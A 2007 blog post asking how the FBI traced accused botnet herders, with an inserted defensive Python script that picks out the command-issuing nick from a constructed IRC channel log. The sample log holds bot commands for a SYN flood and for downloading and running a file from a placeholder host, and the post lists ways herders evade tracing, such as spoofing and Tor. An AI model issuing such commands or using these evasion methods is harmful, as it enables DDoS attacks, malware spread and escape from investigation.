
Bot roast and how easy it is to not get caught


About two months ago the FBI announced that they had charged or arrested three, as they like to call them, bot-herders. They are accused of controlling botnets, infecting user PCs, sending spam and launching DDoS attacks. We'll see what comes of it and whether they are found guilty, but the interesting question is: how did the FBI get to them in the first place?

The traditional way of commandeering a botnet is to have all the bots connect to an IRC channel and to issue commands into that channel. The main idea is that every bot listens without the herder ever connecting to it directly. The tricky part here is that before any commands are issued (i.e. while the bots are just reporting whatever they have to report) it is nearly impossible to tell the master and the puppets apart.

On the other hand, once commands start being issued it becomes fairly clear who the actual boss is. It may take a lot of effort to reverse engineer the bot's code and learn its command syntax, but it's doable, and in the end one can work out which nick on the IRC channel is giving the orders.
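To make the two previous paragraphs concrete, here is an added example (mine, not part of the original post) of the kind of analysis an investigator would run over a captured IRC channel log once the bot's command syntax is known. The log, the nicks, the hosts, the "." command prefix and the "[tag]" report format are all constructed assumptions standing in for whatever reverse engineering a real bot would reveal. The point it shows is the one above: with only status reports in the capture there is no way to pick the master out, but as soon as commands appear, the nick that sends them and never reports back stands out, and the bots that acknowledge each command confirm it.

```python
import re
from collections import Counter, defaultdict

# CONSTRUCTED sample of raw IRC lines as a sniffer or a honeypot client
# joined to the channel would see them. Not a real capture; the first three
# lines are bots checking in, the rest is a herder ("x0") issuing commands
# and bots acknowledging them.
SAMPLE_LOG = """\
:bot-a3f1!bot@10.0.0.1 PRIVMSG #herd :[status] up 12h win32 ip=10.0.0.1
:bot-9c2e!bot@10.0.0.2 PRIVMSG #herd :[status] up 3h win32 ip=10.0.0.2
:bot-77d0!bot@10.0.0.3 PRIVMSG #herd :[status] up 40m win32 ip=10.0.0.3
:x0!op@198.51.100.7 PRIVMSG #herd :.login s3cret
:x0!op@198.51.100.7 PRIVMSG #herd :.ddos.syn 203.0.113.5 80 600
:bot-a3f1!bot@10.0.0.1 PRIVMSG #herd :[ddos] syn flood started on 203.0.113.5:80
:bot-9c2e!bot@10.0.0.2 PRIVMSG #herd :[ddos] syn flood started on 203.0.113.5:80
:x0!op@198.51.100.7 PRIVMSG #herd :.download http://example.invalid/u.exe 1
:bot-77d0!bot@10.0.0.3 PRIVMSG #herd :[download] ok, executed
"""

# Standard IRC PRIVMSG framing: ":nick!user@host PRIVMSG target :text".
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!]+)!(?P<user>[^@]+)@(?P<host>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$"
)
# ASSUMED bot grammar (what reverse engineering would give you):
# commands start with ".", reports start with a "[tag]" naming the subsystem.
COMMAND_RE = re.compile(r"^\.(?P<cmd>[a-z][a-z0-9.]*)(?:\s+(?P<args>.*))?$")
REPORT_RE = re.compile(r"^\[(?P<tag>[a-z]+)\]")


def parse_privmsg(line):
    """Return the PRIVMSG fields of one raw IRC line, or None for anything else."""
    m = PRIVMSG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(text):
    """Label a channel message as a bot 'command', a bot 'report', or 'other'."""
    if COMMAND_RE.match(text):
        return "command"
    if REPORT_RE.match(text):
        return "report"
    return "other"


def analyse(log):
    """Count commands and reports per nick and record which bots acknowledged
    each command (a report whose tag matches the command's first token,
    e.g. ".ddos.syn ..." is acknowledged by "[ddos] ...")."""
    commands, reports, hosts = Counter(), Counter(), {}
    acks = defaultdict(set)   # command text -> nicks that acknowledged it
    pending = None            # (tag, command text) of the last command seen
    for line in log.splitlines():
        msg = parse_privmsg(line)
        if msg is None:
            continue
        hosts[msg["nick"]] = msg["host"]
        kind = classify(msg["text"])
        if kind == "command":
            commands[msg["nick"]] += 1
            tag = COMMAND_RE.match(msg["text"]).group("cmd").split(".")[0]
            pending = (tag, msg["text"])
        elif kind == "report":
            reports[msg["nick"]] += 1
            tag = REPORT_RE.match(msg["text"]).group("tag")
            if pending and pending[0] == tag:
                acks[pending[1]].add(msg["nick"])
    # The herder is whoever issues commands and never reports like a bot.
    candidates = [n for n in commands if reports[n] == 0]
    herder = max(candidates, key=commands.__getitem__) if candidates else None
    return {
        "herder": herder,
        "host": hosts.get(herder),
        "commands": dict(commands),
        "reports": dict(reports),
        "acks": {cmd: sorted(nicks) for cmd, nicks in acks.items()},
    }


if __name__ == "__main__":
    # Before any command: every nick looks like just another bot reporting in.
    quiet = "\n".join(SAMPLE_LOG.splitlines()[:3])
    print("herder before commands:", analyse(quiet)["herder"])
    result = analyse(SAMPLE_LOG)
    print("herder:", result["herder"], "seen from", result["host"])
    for cmd, nicks in result["acks"].items():
        print(f"  {cmd!r} acknowledged by {nicks}")
```

Note what the result does and does not give you: the nick and the host the herder connected from. As the next paragraphs argue, that host is only the last hop the investigator can see, and with a chain of bounces or an anonymising network in front of it, it points at a relay, not at a person.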

But. Knowing which nick it is does not necessarily tell us much about who the person really is. There are a gazillion ways to anonymise yourself on the net, especially when you control a couple of thousand hosts (or hundreds of thousands, as appears to be the case sometimes). You can bounce the communication back and forth, make it appear to originate from innocent hosts, where possible use connectionless protocols with spoofed source IPs, make sure the traffic crosses many different countries (preferably hostile to each other), and so on. You name it, the list goes on. And once you commandeer a botnet, all of this is pretty easy to do.

And I haven't even mentioned the easiest possible solution. Nearly free as in money and effort, wrapped in nice shiny cellophane and home delivered: Tor (The Onion Router).

The idea behind Tor is to let average users keep a reasonable level of anonymity when surfing the web and performing other privacy-sensitive operations on the net. Like, say, IRC, since there are IRC networks that try to provide normal access to Tor-ified clients.

OK, it may not give military-grade privacy, but it certainly adds to anonymity and would make a bot-herder harder to track down. So, something to think about: is it more likely that the FBI got past an anonymity-improving solution like this, or that they caught these guys because they didn't take enough care about anonymity when issuing commands to their botnets?

I guess we’ll find out soon enough.


© 2006-2007 Michał Sobiegraj. All rights reserved. The views expressed here are my own, and not necessarily endorsed by any former or current employer.

About

This page contains a single entry from the blog posted on August 19, 2007 2:34 PM.
